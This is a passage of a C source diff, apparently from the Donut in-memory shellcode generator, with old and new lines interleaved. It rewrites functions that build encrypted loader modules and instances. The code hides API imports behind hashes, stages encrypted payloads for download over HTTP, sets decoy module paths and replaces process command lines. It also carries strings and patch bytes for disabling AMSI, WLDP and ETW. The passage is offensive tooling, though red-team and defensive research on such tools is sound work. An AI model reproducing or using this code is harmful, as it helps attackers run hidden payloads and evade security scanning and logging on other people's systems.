564 cor = (PIMAGE_COR20_HEADER)(ofs + fi.data);
565 rva = cor->MetaData.VirtualAddress;
566 if(rva != 0) {
567 ofs = rva2ofs(fi.data, rva);
568 if(ofs != -1) {
569 pss = (PMDSTORAGESIGNATURE)(ofs + fi.data);
570 DPRINT("Runtime version : %s", (char*)pss->pVersion);
571 strncpy(fi.ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
572 }
385573 }
386574 }
387575 }
388576 }
389577 }
578 // assign length of file and type to configuration
579 c->len = fi.len;
580 c->mod_type = fi.type;
390581 cleanup:
391 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
582 if(err != DONUT_ERROR_OK) {
583 DPRINT("Unmapping input file due to errors.");
584 unmap_file();
585 }
586 DPRINT("Leaving with error : %" PRId32, err);
395587 return err;
396588 }
397589
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
590 /**
591 * Function: gen_random
592 * ----------------------------
593 * Generates pseudo-random bytes.
594 *
595 * INPUT : buf = where to store random bytes.
596 * : len = length of random bytes to generate.
597 *
598 * OUTPUT : 1 if ok, else 0
599 */
600 static int gen_random(void *buf, uint64_t len) {
444601 #if defined(WINDOWS)
445602 HCRYPTPROV prov;
446603 int ok;
448605 // 1. acquire crypto context
449606 if(!CryptAcquireContext(
450607 &prov, NULL, NULL,
451 PROV_RSA_AES,
608 PROV_RSA_FULL,
452609 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453610
454611 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
474631 #endif
475632 }
476633
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
634 /**
635 * Function: gen_random_string
636 * ----------------------------
637 * Generates a pseudo-random string
638 *
639 * INPUT : output = pointer to buffer that receives string
640 * : len = length of string to generate
641 *
642 * OUTPUT : 1 if ok, else 0
643 */
644 static int gen_random_string(void *output, uint64_t len) {
480645 uint8_t rnd[DONUT_MAX_NAME];
481646 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
647 char tbl[]="HMN34P67R9TWCXYF"; // https://stackoverflow.com/a/27459196
483648 char *str = (char*)output;
484649
485650 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486651
487652 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
653 if(!gen_random(rnd, DONUT_MAX_NAME)) return 0;
489654
490655 // generate a string using unambiguous characters
491656 for(i=0; i<len; i++) {
495660 return 1;
496661 }
497662
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
663 /**
664 * Function: build_module
665 * ----------------------------
666 * Create a Donut module from Donut configuration
667 *
668 * INPUT : A pointer to a donut configuration
669 *
670 * OUTPUT : Donut error code.
671 */
672 static int build_module(PDONUT_CONFIG c) {
673 PDONUT_MODULE mod = NULL;
674 uint32_t mod_len, data_len;
675 void *data;
676 int err = DONUT_ERROR_OK;
514677
515678 DPRINT("Entering.");
516679
680 // Compress the input file?
681 if(c->compress != DONUT_COMPRESS_NONE) {
682 err = compress_file(c);
683
684 if(err != DONUT_ERROR_OK) {
685 DPRINT("compress_file() failed");
686 return err;
687 }
688 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.zlen, fi.zdata);
689 data = fi.zdata;
690 data_len = fi.zlen;
691 } else {
692 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.len, fi.data);
693 data = fi.data;
694 data_len = fi.len;
695 }
517696 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
697 mod_len = data_len + sizeof(DONUT_MODULE);
698
699 DPRINT("Allocating %" PRIi32 " bytes of memory for DONUT_MODULE", mod_len);
700 mod = calloc(mod_len, 1);
521701
522702 // Memory not allocated? exit
523703 if(mod == NULL) {
704 DPRINT("calloc() failed");
524705 return DONUT_ERROR_NO_MEMORY;
525706 }
526707
527 // Set the type of module
528 mod->type = fi->type;
529
708 // Set the module info
709 mod->type = fi.type;
710 mod->thread = c->thread;
711 mod->compress = c->compress;
712 mod->unicode = c->unicode;
713 mod->zlen = fi.zlen;
714 mod->len = fi.len;
715
530716 // DotNet assembly?
531717 if(mod->type == DONUT_MODULE_NET_DLL ||
532718 mod->type == DONUT_MODULE_NET_EXE)
533719 {
534 // If no domain name specified, generate a random one
720 // If no domain name specified in configuration
535721 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
722 // if entropy is enabled
723 if(c->entropy != DONUT_ENTROPY_NONE) {
724 // generate a random name
725 if(!gen_random_string(c->domain, DONUT_DOMAIN_LEN)) {
726 DPRINT("gen_random_string() failed");
727 err = DONUT_ERROR_RANDOM;
728 goto cleanup;
729 }
539730 }
540731 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
543 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
545
732 DPRINT("Domain : %s", c->domain[0] == 0 ? "Default" : c->domain);
733 if(c->domain[0] != 0) {
734 // Set the domain name in module
735 strncpy(mod->domain, c->domain, DONUT_DOMAIN_LEN);
736 } else {
737 memset(mod->domain, 0, DONUT_DOMAIN_LEN);
738 }
546739 // Assembly is DLL? Copy the class and method
547740 if(mod->type == DONUT_MODULE_NET_DLL) {
548741 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
742 strncpy(mod->cls, c->cls, DONUT_MAX_NAME-1);
550743
551744 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
745 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
553746 }
554747 // If no runtime specified in configuration, use version from assembly
555748 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
749 strncpy(c->runtime, fi.ver, DONUT_MAX_NAME-1);
557750 }
558751 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
752 strncpy(mod->runtime, c->runtime, DONUT_MAX_NAME-1);
560753 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
754 // Unmanaged DLL? copy function name to module
755 if(mod->type == DONUT_MODULE_DLL && c->method[0] != 0) {
565756 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
757 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
567758 }
568759
569760 // Parameters specified?
570 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
761 if(c->args[0] != 0) {
762 // If file type is unmanaged EXE
763 if(mod->type == DONUT_MODULE_EXE) {
764 // If entropy is disabled
765 if(c->entropy == DONUT_ENTROPY_NONE) {
766 // Set to "AAAA"
767 memset(mod->args, 'A', 4);
768 } else {
769 // Generate 4-byte random name
770 if(!gen_random_string(mod->args, 4)) {
771 DPRINT("gen_random_string() failed");
772 err = DONUT_ERROR_RANDOM;
773 goto cleanup;
774 }
582775 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
776 // Add space
777 mod->args[4] = ' ';
778 }
779 //
780 // Copy parameters
781 strncat(mod->args, c->args, DONUT_MAX_NAME-6);
782 }
783 DPRINT("Copying data to module");
784
785 memcpy(&mod->data, data, data_len);
598786 // update configuration with pointer to module
599787 c->mod = mod;
600 c->mod_len = len;
601
788 c->mod_len = mod_len;
602789 cleanup:
603790 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
791 if(err != DONUT_ERROR_OK) {
792 DPRINT("Releasing memory due to errors.");
605793 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
794 }
795 DPRINT("Leaving with error : %" PRId32, err);
610796 return err;
611797 }
612798
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
799 /**
800 * Function: build_instance
801 * ----------------------------
802 * Creates the data necessary for main loader to execute VBS/JS/EXE/DLL files in memory.
803 *
804 * INPUT : Pointer to a Donut configuration.
805 *
806 * OUTPUT : Donut error code.
807 */
808 static int build_instance(PDONUT_CONFIG c) {
614809 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
810 PDONUT_INSTANCE inst = NULL;
811 int cnt, inst_len;
617812 uint64_t dll_hash;
618 int cnt;
813 int err = DONUT_ERROR_OK;
619814
620815 DPRINT("Entering.");
621816
622817 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
818 DPRINT("Allocating memory for instance");
624819 inst_len = sizeof(DONUT_INSTANCE);
625820
626 // if this is a PIC instance, add the size of module
821 // if the module is embedded, add the size of module
627822 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
823 if(c->inst_type == DONUT_INSTANCE_EMBED) {
824 DPRINT("The size of module is %" PRIi32 " bytes. "
630825 "Adding to size of instance.", c->mod_len);
631826 inst_len += c->mod_len;
632827 }
828 DPRINT("Total length of instance : %"PRIi32, inst_len);
829
633830 // allocate zero-initialized memory for instance
634831 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
832
636833 // Memory allocation failed? exit
637834 if(inst == NULL) {
835 DPRINT("Memory allocation failed");
638836 return DONUT_ERROR_NO_MEMORY;
639837 }
640838
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
839 // set the length of instance and pointer to it in configuration
840 c->inst = inst;
841 c->inst_len = inst->len = inst_len;
842 // set the type of instance we're creating
843 inst->type = c->inst_type;
844 // indicate if we should call RtlExitUserProcess to terminate host process
845 inst->exit_opt = c->exit_opt;
846 // set the Original Entry Point
847 inst->oep = c->oep;
848 // set the entropy level
849 inst->entropy = c->entropy;
850 // set the bypass level
851 inst->bypass = c->bypass;
852 // set the headers level
853 inst->headers = c->headers;
854 // set the module length
855 inst->mod_len = c->mod_len;
856
857 // encryption enabled?
858 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
859 DPRINT("Generating random key for instance");
860 if(!gen_random(&inst_key, sizeof(DONUT_CRYPT))) {
861 DPRINT("gen_random() failed");
862 err = DONUT_ERROR_RANDOM;
863 goto cleanup;
864 }
865 // copy local key to configuration
866 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
867
868 DPRINT("Generating random key for module");
869 if(!gen_random(&mod_key, sizeof(DONUT_CRYPT))) {
870 DPRINT("gen_random() failed");
871 err = DONUT_ERROR_RANDOM;
872 goto cleanup;
873 }
874 // copy local key to configuration
875 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
876
877 DPRINT("Generating random string to verify decryption");
878 if(!gen_random_string(inst->sig, DONUT_SIG_LEN)) {
879 DPRINT("gen_random() failed");
880 err = DONUT_ERROR_RANDOM;
881 goto cleanup;
882 }
883
884 DPRINT("Generating random IV for Maru hash");
885 if(!gen_random(&inst->iv, MARU_IV_LEN)) {
886 DPRINT("gen_random() failed");
887 err = DONUT_ERROR_RANDOM;
888 goto cleanup;
889 }
890 }
891
892 DPRINT("Generating hashes for API using IV: %" PRIX64, inst->iv);
666893
667894 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668895 // calculate hash for DLL string
672899 // xor with DLL hash and store in instance
673900 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674901
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
902 DPRINT("Hash for %-15s : %-22s = %016" PRIX64,
676903 api_imports[cnt].module,
677904 api_imports[cnt].name,
678905 inst->api.hash[cnt]);
679906 }
680 // save how many API to resolve
907
908 DPRINT("Setting number of API to %" PRIi32, cnt);
681909 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
910
911 DPRINT("Setting DLL names to %s", DLL_NAMES);
912 strcpy(inst->dll_names, DLL_NAMES);
688913
689914 // if module is .NET assembly
690915 if(c->mod_type == DONUT_MODULE_NET_DLL ||
705930 {
706931 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707932
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
933 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
934 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
935 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
936 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
937 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
938 memcpy(&inst->xIID_IActiveScriptSiteWindow, &xIID_IActiveScriptSiteWindow, sizeof(GUID));
939 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
940 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
941
942 strcpy(inst->wscript, "WScript");
943 strcpy(inst->wscript_exe, "wscript.exe");
718944
719945 if(c->mod_type == DONUT_MODULE_VBS) {
720946 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721947 } else {
722948 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723949 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
950 }
951
952 // if bypassing enabled, copy these strings over
953 if(c->bypass != DONUT_BYPASS_NONE) {
954 DPRINT("Copying strings required to bypass AMSI");
955
956 strcpy(inst->clr, "clr");
957 strcpy(inst->amsi, "amsi");
958 strcpy(inst->amsiInit, "AmsiInitialize");
959 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
960 strcpy(inst->amsiScanStr, "AmsiScanString");
961
962 DPRINT("Copying strings required to bypass WLDP");
963
964 strcpy(inst->wldp, "wldp");
965 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
966 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
967
968 DPRINT("Copying strings required to bypass ETW");
969 strcpy(inst->ntdll, "ntdll");
970 strcpy(inst->etwEventWrite, "EtwEventWrite");
971 strcpy(inst->etwEventUnregister, "EtwEventUnregister");
972 strcpy(inst->etwRet64, "\xc3");
973 strcpy(inst->etwRet32, "\xc2\x14\x00\x00");
974 }
975
976 // if module is an unmanaged EXE
977 if(c->mod_type == DONUT_MODULE_EXE) {
978 // does the user specify parameters for the command line?
979 if(c->args[0] != 0) {
980 DPRINT("Copying strings required to replace command line.");
981
982 strcpy(inst->dataname, ".data");
983 strcpy(inst->kernelbase, "kernelbase");
984 strcpy(inst->cmd_syms, "_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv");
985 }
986 // does user want loader to run the entrypoint as a thread?
987 if(c->thread != 0) {
988 DPRINT("Copying strings required to intercept exit-related API");
989 // these exit-related API will be replaced with pointer to RtlExitUserThread
990 strcpy(inst->exit_api, "ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit");
991 }
992 }
993
994 // decoy module path
995 if (c->decoy[0] != 0)
727996 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
997 wcscpy((wchar_t*)inst->decoy, L"\\??\\");
998 wchar_t wcFileName[MAX_PATH];
999 mbstowcs(wcFileName, c->decoy, MAX_PATH);
1000 wcsncat((wchar_t*)inst->decoy, wcFileName, MAX_PATH);
1001 }
1002
7511003 // if the module will be downloaded
7521004 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
1005 if(inst->type == DONUT_INSTANCE_HTTP) {
1006 // if no module name specified
1007 if(c->modname[0] == 0) {
1008 // if entropy disabled
1009 if(c->entropy == DONUT_ENTROPY_NONE) {
1010 // set to "AAAAAAAA"
1011 memset(c->modname, 'A', DONUT_MAX_MODNAME);
1012 } else {
1013 // generate a random name for module
1014 // that will be saved to disk
1015 DPRINT("Generating random name for module");
1016 if(!gen_random_string(c->modname, DONUT_MAX_MODNAME)) {
1017 DPRINT("gen_random_string() failed");
1018 err = DONUT_ERROR_RANDOM;
1019 goto cleanup;
1020 }
1021 }
1022 DPRINT("Name for module : %s", c->modname);
1023 }
1024 strcpy(inst->server, c->server);
7631025 // append module name
764 strcat(inst->http.url, c->modname);
1026 strcat(inst->server, c->modname);
7651027 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
1028 strcpy(inst->http_req, "GET");
1029
1030 DPRINT("Loader will attempt to download module from : %s", inst->server);
1031
1032 // encrypt module?
1033 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1034 DPRINT("Encrypting module");
1035
1036 c->mod->mac = maru(inst->sig, inst->iv);
1037
1038 donut_encrypt(
1039 mod_key.mk,
1040 mod_key.ctr,
1041 c->mod,
1042 c->mod_len);
1043 }
1044 } else
1045 // if embedded, copy module to instance
1046 if(inst->type == DONUT_INSTANCE_EMBED) {
7911047 DPRINT("Copying module data to instance");
7921048 memcpy(&c->inst->module.x, c->mod, c->mod_len);
7931049 }
7941050
795 #if !defined(NOCRYPTO)
796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
1051 // encrypt instance?
1052 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1053 DPRINT("Encrypting instance");
1054
1055 inst->mac = maru(inst->sig, inst->iv);
1056
1057 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
1058
1059 donut_encrypt(
1060 inst_key.mk,
1061 inst_key.ctr,
1062 inst_data,
1063 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
1064 }
1065 cleanup:
1066 // error? release memory for everything
1067 if(err != DONUT_ERROR_OK) {
1068 DPRINT("Releasing memory for module due to errors.");
1069 free(c->mod);
1070 }
1071 DPRINT("Leaving with error : %" PRId32, err);
1072 return err;
1073 }
1074
1075 /**
1076 * Function: save_file
1077 * ----------------------------
1078 * Creates a file and writes the contents of input buffer to it.
1079 *
1080 * INPUT : path = where to create file.
1081 * data = what to write to file.
1082 * len = length of data.
1083 *
1084 * OUTPUT : Donut error code.
1085 */
1086 static int save_file(const char *path, void *data, int len) {
1087 FILE *out;
1088 int err = DONUT_ERROR_OK;
8211089
8221090 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
1091 out = fopen(path, "wb");
1092
1093 if(out != NULL) {
1094 DPRINT("Writing %d bytes of %p to %s", len, data, path);
1095 fwrite(data, 1, len, out);
1096 fclose(out);
1097 } else err = DONUT_ERROR_FILE_ACCESS;
1098
1099 DPRINT("Leaving with error : %" PRId32, err);
1100 return err;
1101 }
1102
1103 /**
1104 * Function: save_loader
1105 * ----------------------------
1106 * Saves the loader to output file. Also saves instance for debug builds.
1107 * If the instance type is HTTP, it saves the module to file.
1108 *
1109 * INPUT : Donut configuration.
1110 *
1111 * OUTPUT : Donut error code.
1112 */
1113 static int save_loader(PDONUT_CONFIG c) {
